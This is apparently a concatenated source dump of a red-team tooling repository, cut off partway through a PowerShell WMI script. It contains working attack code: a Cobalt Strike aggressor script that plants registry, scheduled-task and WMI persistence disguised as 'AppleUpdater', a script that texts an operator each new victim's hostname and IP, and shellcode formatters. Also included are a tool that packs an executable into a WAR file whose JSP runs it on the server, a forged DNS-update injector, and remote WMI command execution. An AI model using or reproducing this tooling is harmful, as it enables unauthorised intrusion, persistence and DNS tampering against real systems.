├── CobaltScripts ├── beacontext.py ├── persist_assist.cna ├── removecomments.py ├── shellcode_formatter.ps1 ├── shellcodemodifier.py └── text_aggressor.cna ├── HostScripts ├── ColdWar.py ├── DNSInject.py ├── Invoke-WMITools.ps1 ├── ProcessArchDetection │ ├── .vs │ │ └── ProcessArchDetection │ │ │ └── v16 │ │ │ └── .suo │ ├── ProcessArchDetection.csproj │ ├── ProcessArchDetection.sln │ ├── Program.cs │ └── Properties │ │ └── AssemblyInfo.cs ├── ShareDumper.ps1 ├── enumeration.py └── keylogger.py ├── LICENSE ├── NetworkScripts ├── DNSReverser.py ├── IPSorter.py └── xbmc.py ├── README.md └── WebScripts ├── LinkFinder.py ├── ShodanSearch.py ├── WebTrace.rb ├── enum_server.py └── web └── server.pem /CobaltScripts/beacontext.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | import argparse 4 | import smtplib 5 | from email.MIMEMultipart import MIMEMultipart 6 | from email.MIMEText import MIMEText 7 | 8 | parser = argparse.ArgumentParser(description='beacon info') 9 | parser.add_argument('--computer') 10 | parser.add_argument('--ip') 11 | args = parser.parse_args() 12 | 13 | fromaddr = "" 14 | toaddr = ["7777777777@txt.att.net", "8888888888@vtext.com"] 15 | msg = MIMEMultipart() 16 | msg['From'] = fromaddr 17 | msg['To'] = ", ".join(toaddr) 18 | msg['Subject'] = "INCOMING BEACON" 19 | 20 | hostname = args.computer 21 | internal_ip = args.ip 22 | 23 | body = "Check your teamserver! \nHostname - " + hostname + "\nInternal IP - " + internal_ip 24 | msg.attach(MIMEText(body, 'plain')) 25 | 26 | server = smtplib.SMTP('smtp.gmail.com', 587) 27 | server.starttls() 28 | server.login(fromaddr, "") 29 | text = msg.as_string() 30 | server.sendmail(fromaddr, toaddr, text) 31 | server.quit() 32 | -------------------------------------------------------------------------------- /CobaltScripts/persist_assist.cna: -------------------------------------------------------------------------------- 1 | # Thanks to bluescreenofjeff for his awesome scripts that act as reference! 2 | ############################################################################################################################################################## 3 | ######################################################### Global Variables ################################################################################### 4 | ############################################################################################################################################################## 5 | 6 | # Global Variables 7 | %globalsettings['RegHive'] = 'HKCU'; 8 | %globalsettings['RegPath'] = '\\Software\\Microsoft\\Windows\\CurrentVersion\\Run'; 9 | %globalsettings['RegValue'] = 'RandomKeyDFIR'; 10 | %globalsettings['PayloadPath'] = 'C:\\evil.exe'; 11 | %globalsettings['Action'] = 'Add'; 12 | %globalsettings['TaskName'] = 'AppleUpdater'; 13 | %globalsettings['TaskTrigger'] = 'HOURLY'; 14 | %globalsettings['TaskTime'] = '03:45:50'; 15 | %globalsettings['WMIName'] = 'AppleUpdater'; 16 | 17 | ############################################################################################################################################################## 18 | ################################################# Registry Persistence Section ############################################################################### 19 | ############################################################################################################################################################## 20 | 21 | # Registry Persistence Section 22 | 23 | sub add_regkey { 24 | # PowerShell command to run 25 | $ppick_add = 'New-ItemProperty -Path "' . $2['RegHive'] . ":" . $2['RegPath'] . '" -Name "' . $2['RegValue'] . '" -PropertyType String -Value "' . $2['PayloadPath'] . '"'; 26 | 27 | if(-isadmin $1) { 28 | binput($1, "Installing registry persistence"); 29 | bpowerpick($1, $ppick_add); 30 | } 31 | else { 32 | $lc_hive = lc($2['RegHive']); 33 | if ($lc_hive hasmatch "hklm") { 34 | berror($1, "You can't write to HKLM without admin rights!"); 35 | } 36 | else { 37 | binput($1, "Installing registry persistence"); 38 | bpowerpick($1, $ppick_add); 39 | } 40 | } 41 | } 42 | 43 | sub remove_regkey { 44 | $ppick_remove = 'Remove-ItemProperty -Path "' . $2['RegHive'] . ":" . $2['RegPath'] . '" -Name "' . $2['RegValue'] . '"'; 45 | if(-isadmin $1) { 46 | binput($1, "Removing Registry Persistence"); 47 | bpowerpick($1, $ppick_remove); 48 | } 49 | else { 50 | $lc_hive = lc($2['RegHive']); 51 | if ($lc_hive hasmatch "hklm") { 52 | berror($1, "You can't remove from HKLM without admin rights!"); 53 | } 54 | else { 55 | binput($1, "Removing registry persistence"); 56 | bpowerpick($1, $ppick_remove); 57 | } 58 | } 59 | } 60 | 61 | sub reg_method { 62 | # Find the proper beacon ID to use 63 | foreach $beacon (beacons()) { 64 | if ($3['Target'] eq $beacon['pid']) { 65 | $incoming_regmethod = lc($3['Action']); 66 | if ($incoming_regmethod eq 'add') { 67 | add_regkey($beacon['id'], $3); 68 | } 69 | else if ($incoming_regmethod eq 'remove') { 70 | remove_regkey($beacon['id'], $3); 71 | } 72 | else { 73 | berror($1, 'You did not provide a valid action to take! [Add] or [Remove]!'); 74 | println('hit error block'); 75 | } 76 | } 77 | } 78 | clear($3); 79 | } 80 | 81 | sub reg_persistence { 82 | # Get all process IDs of selected beacons 83 | @total_proc_ids = @(); 84 | foreach $beacon (beacons()) { 85 | add(@total_proc_ids, $beacon['pid']); 86 | } 87 | 88 | $dialogbox = dialog("Registry Persistence", %(RegHive => %globalsettings['RegHive'], RegPath => %globalsettings['RegPath'], RegValue => %globalsettings['RegValue'], PayloadPath => %globalsettings['PayloadPath'], Action => %globalsettings['Action'], Target => @total_proc_ids), ®_method); 89 | dialog_description($dialogbox, "Set or remove registry based persistence"); 90 | 91 | drow_text($dialogbox, "RegHive", "Registry Hive:"); 92 | drow_text($dialogbox, "RegPath", "Registry Path:"); 93 | drow_text($dialogbox, "RegValue", "Registry Value:"); 94 | drow_text($dialogbox, "PayloadPath", "Payload:"); 95 | drow_combobox($dialogbox, "Action", "Add or Remove:", @('Add', 'Remove')); 96 | drow_combobox($dialogbox, "Target", "Targeted System (PID):", @total_proc_ids); 97 | dbutton_action($dialogbox, "Launch"); 98 | 99 | dialog_show($dialogbox); 100 | clear(@total_proc_ids); 101 | } 102 | 103 | ############################################################################################################################################################## 104 | ###################################################### Scheduled Task Section ################################################################################ 105 | ############################################################################################################################################################## 106 | 107 | # Scheduled task section 108 | 109 | sub add_task { 110 | # PowerShell command to run 111 | $shell_add = 'schtasks /create /tn "' . $2['TaskName'] . '" /tr "' . $2['Payload'] . '" /sc ' . $2['TaskTrigger'] . ' /st ' . $2['TaskTime']; 112 | 113 | # Create the task 114 | binput($1, "Installing scheduled task persistence"); 115 | bpowerpick($1, $shell_add); 116 | } 117 | 118 | sub remove_task { 119 | $shell_remove = 'schtasks /delete /tn "' . $2['TaskName'] . '" /F'; 120 | 121 | # Delete the task 122 | binput($1, "Removing scheduled task persistence"); 123 | bpowerpick($1, $shell_remove); 124 | } 125 | 126 | sub sch_task_persistence { 127 | # Get all process IDs of selected beacons 128 | @total_proc_ids = @(); 129 | foreach $beacon (beacons()) { 130 | add(@total_proc_ids, $beacon['pid']); 131 | } 132 | 133 | $dialogbox = dialog("Scheduled Task Persistence", %(TaskName => %globalsettings['TaskName'], TaskTime => %globalsettings['TaskTime'], Payload => %globalsettings['PayloadPath'], TaskTrigger => %globalsettings['TaskTrigger'], Action => %globalsettings['Action'], Target => $1), &task_method); 134 | 135 | drow_text($dialogbox, "TaskName", "Scheduled Task Name:"); 136 | drow_text($dialogbox, "TaskTime", "Scheduled Task Trigger Time:"); 137 | drow_text($dialogbox, "TaskTrigger", "Scheduled Task Trigger:"); 138 | drow_text($dialogbox, "Payload", "Payload:"); 139 | drow_combobox($dialogbox, "Action", "Add or Remove:", @('Add', 'Remove')); 140 | drow_combobox($dialogbox, "Target", "Targeted System (PID):", @total_proc_ids); 141 | dbutton_action($dialogbox, "Launch"); 142 | 143 | dialog_show($dialogbox); 144 | clear(@total_proc_ids); 145 | } 146 | 147 | sub task_method { 148 | # Find the proper beacon ID to use 149 | foreach $beacon (beacons()) { 150 | if ($3['Target'] eq $beacon['pid']) { 151 | $incoming_taskmethod = lc($3['Action']); 152 | if ($incoming_taskmethod eq 'add') { 153 | add_task($beacon['id'], $3); 154 | } 155 | else if ($incoming_taskmethod eq 'remove') { 156 | remove_task($beacon['id'], $3); 157 | } 158 | else { 159 | berror($1, 'You did not provide a valid action to take! [Add] or [Remove]!'); 160 | println('hit error block'); 161 | } 162 | } 163 | } 164 | clear($3); 165 | } 166 | 167 | ############################################################################################################################################################## 168 | ########################################################### WMI Based Persistence ############################################################################ 169 | ############################################################################################################################################################## 170 | 171 | # WMI based persistence 172 | 173 | sub add_wmi { 174 | if(-isadmin $1) { 175 | # PowerShell command to run 176 | $wmi_add = "\$Filter=Set-WmiInstance -Class __EventFilter -Namespace \"root\\subscription\" -Arguments @{name='" . $2['WMIName'] . "';EventNameSpace='root\\CimV2';QueryLanguage=\"WQL\";Query=\"SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System' AND TargetInstance.SystemUpTime >= 201 AND TargetInstance.SystemUpTime < 323\"};\$Consumer = Set-WmiInstance -Class CommandLineEventConsumer -Namespace \"root\\subscription\" -Arguments @{Name='" . $2['WMIName'] . "';CommandLineTemplate ='" . $2['Payload'] . "'};Set-WmiInstance -Namespace \"root\\subscription\" -Class __FilterToConsumerBinding -Arguments @{Filter=\$Filter;Consumer=\$Consumer};"; 177 | 178 | # Install WMI persistence 179 | binput($1, "Installing wmi persistence"); 180 | bpowerpick($1, $wmi_add); 181 | } 182 | else { 183 | berror($1, "You can't install WMI persistence without admin rights!"); 184 | } 185 | } 186 | 187 | sub remove_wmi { 188 | if(-isadmin $1) { 189 | $wmi_remove1 = "Get-WmiObject __eventFilter -namespace root\\subscription -filter \"name='" . $2['WMIName'] . "'\"| Remove-WmiObject"; 190 | $wmi_remove2 = "Get-WmiObject CommandLineEventConsumer -Namespace root\\subscription -filter \"name='" . $2['WMIName'] . "'\" | Remove-WmiObject"; 191 | $wmi_remove3 = "Get-WmiObject __FilterToConsumerBinding -Namespace root\\subscription | Where-Object { \$_.filter -match '" . $2['WMIName'] . "'} | Remove-WmiObject"; 192 | 193 | # Delete wmi persistence 194 | binput($1, "Removing wmi persistence"); 195 | bpowerpick($1, $wmi_remove1); 196 | bpowerpick($1, $wmi_remove2); 197 | bpowerpick($1, $wmi_remove3); 198 | } 199 | else { 200 | berror($1, "You can't remove WMI persistence without admin rights!"); 201 | } 202 | 203 | } 204 | 205 | sub wmi_persistence { 206 | # Get all process IDs of selected beacons 207 | @total_proc_ids = @(); 208 | foreach $beacon (beacons()) { 209 | add(@total_proc_ids, $beacon['pid']); 210 | } 211 | 212 | $dialogbox = dialog("WMI Persistence", %(WMIName => %globalsettings['WMIName'], Payload => %globalsettings['PayloadPath'], Action => %globalsettings['Action'], Target => $1), &wmi_method); 213 | 214 | drow_text($dialogbox, "WMIName", "WMI Name:"); 215 | drow_text($dialogbox, "Payload", "Payload:"); 216 | drow_combobox($dialogbox, "Action", "Add or Remove:", @('Add', 'Remove')); 217 | drow_combobox($dialogbox, "Target", "Targeted System (PID):", @total_proc_ids); 218 | dbutton_action($dialogbox, "Launch"); 219 | 220 | dialog_show($dialogbox); 221 | clear(@total_proc_ids); 222 | } 223 | 224 | sub wmi_method { 225 | # Find the proper beacon ID to use 226 | foreach $beacon (beacons()) { 227 | if ($3['Target'] eq $beacon['pid']) { 228 | $incoming_taskmethod = lc($3['Action']); 229 | if ($incoming_taskmethod eq 'add') { 230 | add_wmi($beacon['id'], $3); 231 | } 232 | else if ($incoming_taskmethod eq 'remove') { 233 | remove_wmi($beacon['id'], $3); 234 | } 235 | else { 236 | berror($1, 'You did not provide a valid action to take! [Add] or [Remove]!'); 237 | println('hit error block'); 238 | } 239 | } 240 | } 241 | clear($3); 242 | } 243 | 244 | ############################################################################################################################################################## 245 | ########################################################### Pop-Up Menu Section ############################################################################## 246 | ############################################################################################################################################################## 247 | 248 | # Pop-up Menu Section 249 | 250 | popup beacon_bottom { 251 | item "Registry Persistence" { 252 | reg_persistence($1); 253 | } 254 | item "Scheduled Task Persistence" { 255 | sch_task_persistence($1); 256 | } 257 | item "WMI Persistence" { 258 | wmi_persistence($1); 259 | } 260 | } -------------------------------------------------------------------------------- /CobaltScripts/removecomments.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | #remove comments from PowerShell scripts 4 | currently_code = True 5 | 6 | with open('/root/Downloads/powersql.ps1', 'r') as readtest: 7 | psup_contents = readtest.readlines() 8 | 9 | with open('/root/Downloads/stripped.ps1', 'w') as removed: 10 | for line in psup_contents: 11 | line = line.lstrip() 12 | 13 | if line.startswith("#") and not line.startswith("#>"): 14 | pass 15 | 16 | elif line.startswith("<#"): 17 | currently_code = False 18 | 19 | elif line.startswith('\n'): 20 | pass 21 | 22 | elif line.startswith("#>"): 23 | currently_code = True 24 | 25 | else: 26 | if currently_code: 27 | removed.write(line) 28 | 29 | -------------------------------------------------------------------------------- /CobaltScripts/shellcode_formatter.ps1: -------------------------------------------------------------------------------- 1 | $fileName = "C:\Users\User\Desktop\payload.bin" 2 | $fileContent = [IO.File]::ReadAllBytes($fileName) 3 | $filecontentsencoded = [convert]::ToBase64String($fileContent) 4 | "Binary Blob base64 encoded:`n`n" + $filecontentsencoded | set-content ($fileName + ".b64") 5 | 6 | $scformat = '\x' + (($fileContent | ForEach-Object ToString x2) -join '\x') 7 | "`nStandard shellcode format:`n`n" + $scformat | add-content ($fileName + ".b64") 8 | 9 | $csharpformat = '0x' + (($fileContent | ForEach-Object ToString x2 | ForEach-Object { $_ + ',' }) -join '0x') 10 | $csharpformat = $csharpformat.SubString(0, $csharpformat.Length-1) 11 | "`nC# formatted shellcode:`n`n" + $csharpformat | add-content ($fileName + ".b64") 12 | 13 | $Bytes = [System.Text.Encoding]::UTF8.GetBytes($csharpformat) 14 | $EncodedText =[Convert]::ToBase64String($Bytes) 15 | "`nBase64 Encoded C# shellcode:`n`n" + $EncodedText | add-content ($fileName + ".b64") 16 | 17 | $fsharpformat = '0x' + (($fileContent | ForEach-Object ToString x2 | ForEach-Object { $_ + 'uy;' }) -join '0x') 18 | $fsharpformat = $fsharpformat.SubString(0, $fsharpformat.Length-1) 19 | "`nF# formatted shellcode:`n`n" + $fsharpformat | add-content ($fileName + ".b64") -------------------------------------------------------------------------------- /CobaltScripts/shellcodemodifier.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | import base64 3 | 4 | # Edit this line with the path to the binary file containing shellcode you are converting 5 | with open('/home/user/Downloads/payload.bin', 'rb') as sc_handle: 6 | sc_data = sc_handle.read() 7 | 8 | # Just raw binary blog base64 encoded 9 | encoded_raw = base64.b64encode(sc_data) 10 | 11 | # Print in "standard" shellcode format \x41\x42\x43.... 12 | binary_code = '' 13 | fs_code = '' 14 | for byte in sc_data: 15 | binary_code += "\\x" + hex(byte)[2:].zfill(2) 16 | # this is for f# 17 | fs_code += "0x" + hex(byte)[2:].zfill(2) + "uy;" 18 | 19 | # Convert this into a C# style shellcode format 20 | cs_shellcode = "0" + ",0".join(binary_code.split("\\")[1:]) 21 | 22 | # Base 64 encode the C# code (for use with certain payloads :)) 23 | encoded_cs = base64.b64encode(cs_shellcode.encode()) 24 | 25 | # Write out the files to disk (edit this path as needed) 26 | with open('formatted_shellcode.txt', 'w') as format_out: 27 | format_out.write("Size in bytes is: " + str(len(sc_data)) + "\n\n") 28 | format_out.write("Binary Blob base64 encoded:\n\n") 29 | format_out.write(encoded_raw.decode('ascii')) 30 | format_out.write("\n\nStandard shellcode format:\n\n") 31 | format_out.write(binary_code) 32 | format_out.write("\n\nC# formatted shellcode:\n\n") 33 | format_out.write(cs_shellcode) 34 | format_out.write("\n\nBase64 Encoded C# shellcode:\n\n") 35 | format_out.write(encoded_cs.decode('ascii')) 36 | format_out.write("\n\nF# Shellcode:\n\n") 37 | format_out.write(fs_code) 38 | format_out.write("\n") 39 | -------------------------------------------------------------------------------- /CobaltScripts/text_aggressor.cna: -------------------------------------------------------------------------------- 1 | on beacon_initial { 2 | local('$computer'); 3 | local('$internal'); 4 | $computer = beacon_info($1, "computer"); 5 | $internal = beacon_info($1, "internal"); 6 | exec("/root/cobaltstrike/emailme.py --ip " . $internal . " --computer '" . $computer . "'"); 7 | } 8 | -------------------------------------------------------------------------------- /HostScripts/ColdWar.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | # This script is designed to take an executable and create a .war file 4 | # This is obviously used for pentesting purposes and executing arbitrary .exe files 5 | # All research came from the awesome metasploit project - 99% of the code logic was from metasploit 6 | # Link to their payload generation is here - https://github.com/rapid7/metasploit-framework/blob/d483f2ad79754b3353ed18784e97bbe6c1489b0b/lib/rex/zip/samples/mkwar.rb 7 | 8 | import argparse 9 | from binascii import hexlify 10 | import zipfile 11 | import random 12 | import string 13 | import os 14 | import sys 15 | 16 | # Code used from our Veil Project to generate random characters 17 | def randomString(length=-1): 18 | """ 19 | Returns a random string of "length" characters. 20 | If no length is specified, resulting string is in between 6 and 15 characters. 21 | """ 22 | if length == -1: length = random.randrange(6,16) 23 | random_string = ''.join(random.choice(string.ascii_letters) for x in range(length)) 24 | return random_string 25 | 26 | # Command line argument parser 27 | parser = argparse.ArgumentParser(description="Convert your executable into a .war file.") 28 | parser.add_argument("-exe", help="Path to the .exe you wish to convert to a .war file") 29 | parser.add_argument("-out", help="Output path of .war file") 30 | args = parser.parse_args() 31 | 32 | # Quick error checking 33 | if not args.exe: 34 | print "You didn't give me an executable via the CLI..." 35 | sys.exit() 36 | 37 | if not args.out: 38 | print "You didn't provide an output path for the .war file..." 39 | sys.exit() 40 | 41 | # Set up all our variables 42 | var_hexpath = randomString() 43 | var_exepath = randomString() 44 | var_data = randomString() 45 | var_inputstream = randomString() 46 | var_outputstream = randomString() 47 | var_numbytes = randomString() 48 | var_bytearray = randomString() 49 | var_bytes = randomString() 50 | var_counter = randomString() 51 | var_char1 = randomString() 52 | var_char2 = randomString() 53 | var_comb = randomString() 54 | var_exe = randomString() 55 | var_hexfile = randomString() 56 | var_proc = randomString() 57 | var_name = randomString() 58 | var_payload = randomString() 59 | 60 | # text file containing the executable 61 | try: 62 | raw = open(args.exe, 'rb').read() 63 | txt_exe = hexlify(raw) 64 | txt_payload_file = open(var_hexfile + ".txt", 'w') 65 | txt_payload_file.write(txt_exe) 66 | txt_payload_file.close() 67 | except IOError: 68 | print "ERROR: You didn't provide the path to an executable" 69 | sys.exit() 70 | 71 | # Set up our JSP files used for triggering the payload within the war file 72 | jsp_payload = "<%@ page import=\"java.io.*\" %>\n" 73 | jsp_payload += "<%\n" 74 | jsp_payload += "String " + var_hexpath + " = application.getRealPath(\"/\") + \"" + var_hexfile + ".txt\";\n" 75 | jsp_payload += "String " + var_exepath + " = System.getProperty(\"java.io.tmpdir\") + \"/" + var_exe + "\";\n" 76 | jsp_payload += "String " + var_data + " = \"\";\n" 77 | jsp_payload += "if (System.getProperty(\"os.name\").toLowerCase().indexOf(\"windows\") != -1){\n" 78 | jsp_payload += var_exepath + " = " + var_exepath + ".concat(\".exe\");\n" 79 | jsp_payload += "}\n" 80 | jsp_payload += "FileInputStream " + var_inputstream + " = new FileInputStream(" + var_hexpath + ");\n" 81 | jsp_payload += "FileOutputStream " + var_outputstream + " = new FileOutputStream(" + var_exepath + ");\n" 82 | jsp_payload += "int " + var_numbytes + " = " + var_inputstream + ".available();\n" 83 | jsp_payload += "byte " + var_bytearray + "[] = new byte[" + var_numbytes + "];\n" 84 | jsp_payload += var_inputstream + ".read(" + var_bytearray + ");\n" 85 | jsp_payload += var_inputstream + ".close();\n" 86 | jsp_payload += "byte[] " + var_bytes + " = new byte[" + var_numbytes + "/2];\n" 87 | jsp_payload += "for (int " + var_counter + " = 0; " + var_counter + " < " + var_numbytes + "; " + var_counter + " += 2)\n" 88 | jsp_payload += "{\n" 89 | jsp_payload += "char " + var_char1 + " = (char) " + var_bytearray + "[" + var_counter + "];\n" 90 | jsp_payload += "char " + var_char2 + " = (char) " + var_bytearray + "[" + var_counter+ " + 1];\n" 91 | jsp_payload += "int " + var_comb + " = Character.digit(" + var_char1 + ", 16) & 0xff;\n" 92 | jsp_payload += var_comb + " <<= 4;\n" 93 | jsp_payload += var_comb + " += Character.digit(" + var_char2 + ", 16) & 0xff;\n" 94 | jsp_payload += var_bytes + "[" + var_counter + "/2] = (byte)" + var_comb + ";\n" 95 | jsp_payload += "}\n" 96 | jsp_payload += var_outputstream + ".write(" + var_bytes + ");\n" 97 | jsp_payload += var_outputstream + ".close();\n" 98 | jsp_payload += "Process " + var_proc + " = Runtime.getRuntime().exec(" + var_exepath + ");\n" 99 | jsp_payload += "%>\n" 100 | 101 | jsp_file_out = open(var_payload + ".jsp", 'w') 102 | jsp_file_out.write(jsp_payload) 103 | jsp_file_out.close() 104 | 105 | # MANIFEST.MF file contents 106 | manifest_file = "Manifest-Version: 1.0\r\nCreated-By: 1.6.0_17 (Sun Microsystems Inc.)\r\n\r\n" 107 | man_file = open("MANIFEST.MF", 'w') 108 | man_file.write(manifest_file) 109 | man_file.close() 110 | 111 | # web.xml file contents 112 | web_xml_contents = "\n" 113 | web_xml_contents += "\n" 116 | web_xml_contents += "\n" 117 | web_xml_contents += "\n" 118 | web_xml_contents += "" + var_name + "\n" 119 | web_xml_contents += "/" + var_payload + ".jsp\n" 120 | web_xml_contents += "\n" 121 | web_xml_contents += "\n" 122 | 123 | # Create our web.xml files 124 | xml_file = open("web.xml", 'w') 125 | xml_file.write(web_xml_contents) 126 | xml_file.close() 127 | 128 | # Create our directories needed for the war file 129 | os.system("mkdir META-INF") 130 | os.system("mkdir WEB-INF") 131 | os.system("mv web.xml WEB-INF/") 132 | os.system("mv MANIFEST.MF META-INF/") 133 | 134 | # Make the war file by zipping everything together 135 | # Some ideas from - http://stackoverflow.com/questions/458436/adding-folders-to-a-zip-file-using-python 136 | myZipFile = zipfile.ZipFile(args.out, "w" ) 137 | myZipFile.write(var_payload + ".jsp", var_payload + ".jsp", zipfile.ZIP_DEFLATED) 138 | myZipFile.write(var_hexfile + ".txt", var_hexfile + ".txt", zipfile.ZIP_DEFLATED) 139 | myZipFile.write("META-INF/MANIFEST.MF", "META-INF/MANIFEST.MF", zipfile.ZIP_DEFLATED) 140 | myZipFile.write("WEB-INF/web.xml", "WEB-INF/web.xml", zipfile.ZIP_DEFLATED) 141 | myZipFile.close() 142 | 143 | # Clean up the individual files, you can always unzip the war to see them again 144 | os.system("rm -rf WEB-INF") 145 | os.system("rm -rf META-INF") 146 | os.system("rm " + var_payload + ".jsp") 147 | os.system("rm " + var_hexfile + ".txt") -------------------------------------------------------------------------------- /HostScripts/DNSInject.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # by Chris Truncer 3 | 4 | # Script to attempt to forge a packet that will inject a new value 5 | # for a dns record. Check nessus plugin #35372 6 | # Some great documentation and sample code came from: 7 | # http://bb.secdev.org/scapy/src/46e0b3e619547631d704c133a0247cf4683c0784/scapy/layers/dns.py 8 | 9 | 10 | import argparse 11 | import logging 12 | # I know it's bad practice to add code up here, but it's the only way I could 13 | # see to suppress the IPv6 warning from scapy (By setting this 14 | # before importing scapy). 15 | logging.getLogger("scapy.runtime").setLevel(logging.ERROR) 16 | import os 17 | from scapy.all import IP, UDP, DNS, DNSQR, DNSRR, sr1 18 | import sys 19 | 20 | 21 | def add_a_record(name_server, new_dns_record, ip_value): 22 | 23 | os.system('clear') 24 | title() 25 | 26 | # Verifying all required options have a populated value 27 | if name_server is None or new_dns_record is None or ip_value is None: 28 | print "[*] ERROR: You did not provide all the required command line options!" 29 | print "[*] ERROR: Please re-run with required options." 30 | sys.exit() 31 | 32 | print "[*] Crafting packet for record injection..." 33 | print "[*] Sending DNS packet adding " + new_dns_record 34 | print "[*] and pointing it to " + ip_value + "\n" 35 | 36 | dns_zone = new_dns_record[new_dns_record.find(".")+1:] 37 | 38 | # Craft the packet with scapy 39 | add_packet = sr1(IP(dst=name_server)/UDP()/DNS( 40 | opcode=5, 41 | qd=[DNSQR(qname=dns_zone, qtype="SOA")], 42 | ns=[DNSRR(rrname=new_dns_record, 43 | type="A", ttl=120, rdata=ip_value)])) 44 | 45 | print add_packet[DNS].summary() 46 | 47 | print "\n[*] Packet created and sent!" 48 | 49 | 50 | def cli_parser(): 51 | 52 | # Command line argument parser 53 | parser = argparse.ArgumentParser( 54 | add_help=False, 55 | description="DNSInject is a tool for modifying DNS records on vulnerable servers.") 56 | parser.add_argument( 57 | "--add", action='store_true', 58 | help="Add \"A\" record to the vulnerable name server.") 59 | parser.add_argument( 60 | "--delete", action='store_true', 61 | help="Delete \"A\" record from the vulnerable name server.") 62 | parser.add_argument( 63 | "-ns", metavar="ns1.test.com", 64 | help="Nameserver to execute the specified action.") 65 | parser.add_argument( 66 | "-d", metavar="mynewarecord.test.com", 67 | help="Domain name to create an A record for.") 68 | parser.add_argument( 69 | "-ip", metavar="192.168.1.1", 70 | help="IP Address the new record will point to.") 71 | parser.add_argument( 72 | '-h', '-?', '--h', '-help', '--help', action="store_true", 73 | help=argparse.SUPPRESS) 74 | args = parser.parse_args() 75 | 76 | if args.h: 77 | parser.print_help() 78 | sys.exit() 79 | 80 | return args.add, args.delete, args.ns, args.d, args.ip 81 | 82 | 83 | def delete_dns_record(del_ns, del_record): 84 | 85 | os.system('clear') 86 | title() 87 | 88 | # Verifying all required options have a populated value 89 | if del_ns is None or del_record is None: 90 | print "[*] ERROR: You did not provide all the required command line options!" 91 | print "[*] ERROR: Please re-run with required options." 92 | sys.exit() 93 | print "[*] Crafting packet for record deletion..." 94 | 95 | print "[*] Sending packet which deletes the following record: " 96 | print "[*] " + del_record + "\n" 97 | 98 | dns_zone = del_record[del_record.find(".")+1:] 99 | 100 | del_packet = sr1(IP(dst=del_ns)/UDP()/DNS( 101 | opcode=5, 102 | qd=[DNSQR(qname=dns_zone, qtype="SOA")], 103 | ns=[DNSRR(rrname=del_record, type="ALL", 104 | rclass="ANY", ttl=0, rdata="")])) 105 | 106 | print del_packet[DNS].summary() 107 | 108 | print "\n[*] Packet created and sent!" 109 | 110 | 111 | def title(): 112 | print "######################################################################" 113 | print "# DNS Injector #" 114 | print "######################################################################\n" 115 | 116 | return 117 | 118 | 119 | if __name__ == '__main__': 120 | 121 | # Parse command line arguments 122 | action_add, action_delete, dns_nameserver, dns_record, dns_ip = cli_parser() 123 | 124 | #Chose function based on action variable value 125 | try: 126 | if action_add: 127 | add_a_record(dns_nameserver, dns_record, dns_ip) 128 | 129 | elif action_delete: 130 | delete_dns_record(dns_nameserver, dns_record) 131 | 132 | else: 133 | print "[*] ERROR: You didn't provide a valid action." 134 | print "[*] ERROR: Restart and provide your desired action!" 135 | sys.exit() 136 | except AttributeError: 137 | os.system('clear') 138 | title() 139 | print "[*] ERROR: You didn't provide a valid action." 140 | print "[*] ERROR: Restart and provide your desired action!" 141 | -------------------------------------------------------------------------------- /HostScripts/Invoke-WMITools.ps1: -------------------------------------------------------------------------------- 1 | #requires -version 2 2 | 3 | 4 | function Invoke-WorkerWmiExecCommand 5 | { 6 | param 7 | ( 8 | #Parameter assignment 9 | [Parameter(Mandatory = $False)] 10 | [string]$User, 11 | [Parameter(Mandatory = $False)] 12 | [string]$Pass, 13 | [Parameter(Mandatory = $False)] 14 | [string[]]$Targets = ".", 15 | [Parameter(Mandatory = $True)] 16 | [string]$Command 17 | ) 18 | 19 | if($User -and $Pass) 20 | { 21 | # This block of code is executed when starting a process on a remote machine via wmi 22 | $password = ConvertTo-SecureString $Pass -asplaintext -force 23 | $cred = New-Object -Typename System.Management.Automation.PSCredential -argumentlist $User,$password 24 | 25 | Invoke-WmiMethod -class win32_process -name create -Argumentlist $Command -Credential $cred -Computername $Targets 26 | } 27 | 28 | else 29 | { 30 | # If this area of code is invoked, it runs the command on the same machine the script is loaded 31 | Invoke-WmiMethod -class win32_process -name create -Argumentlist $Command 32 | } 33 | } 34 | 35 | function Invoke-WorkerWmiKillProcess 36 | { 37 | param 38 | ( 39 | #Parameter assignment 40 | [Parameter(Mandatory = $False)] 41 | [string]$User, 42 | [Parameter(Mandatory = $False)] 43 | [string]$Pass, 44 | [Parameter(Mandatory = $False)] 45 | [string[]]$Targets = ".", 46 | [Parameter(Mandatory = $False)] 47 | [string]$ProcName, 48 | [Parameter(Mandatory = $False)] 49 | [string]$ProcID 50 | ) 51 | 52 | if($User -and $Pass) 53 | { 54 | # This block of code is executed when starting a process on a remote machine via wmi 55 | $password = ConvertTo-SecureString $Pass -asplaintext -force 56 | $cred = New-Object -Typename System.Management.Automation.PSCredential -argumentlist $User,$password 57 | 58 | if($ProcessName) 59 | { 60 | ForEach($computer in $TARGETS) 61 | { 62 | Get-WmiObject -Class win32_Process -Credential $cred -Computername $computer -Filter "name = '$ProcName'" | ForEach-Object { $_.Terminate() } 63 | } 64 | } 65 | 66 | elseif($ProcessID) 67 | { 68 | ForEach($computer in $TARGETS) 69 | { 70 | Get-WmiObject -Class win32_Process -Credential $cred -Computername $computer -Filter "ProcessID = '$ProcID'" | ForEach-Object { $_.Terminate() } 71 | } 72 | } 73 | 74 | else 75 | { 76 | Write-Verbose "You didn't provide a valid action to take! This script uses processid or processname!" 77 | } 78 | } 79 | 80 | else 81 | { 82 | if($ProcessName) 83 | { 84 | Get-WmiObject -Class win32_Process -Filter "name = '$ProcName'" | ForEach-Object { $_.Terminate() } 85 | } 86 | 87 | elseif($ProcessID) 88 | { 89 | Get-WmiObject -Class win32_Process -Filter "ProcessID = '$ProcID'" | ForEach-Object { $_.Terminate() } 90 | } 91 | 92 | else 93 | { 94 | Write-Verbose "You didn't provide a valid action to take! This script uses processid or processname!" 95 | } 96 | } 97 | } 98 | 99 | 100 | function Invoke-WmiExecCommand 101 | { 102 | <# 103 | .SYNOPSIS 104 | This function is used to run a command/start a process on either the local or a remote machine. This requires local admin access wherever the command is to be executed. 105 | 106 | .DESCRIPTION 107 | This function is used to run a command/start a process on either the local or a remote machine. This can be used to simply ping a machine, run an executable, or run 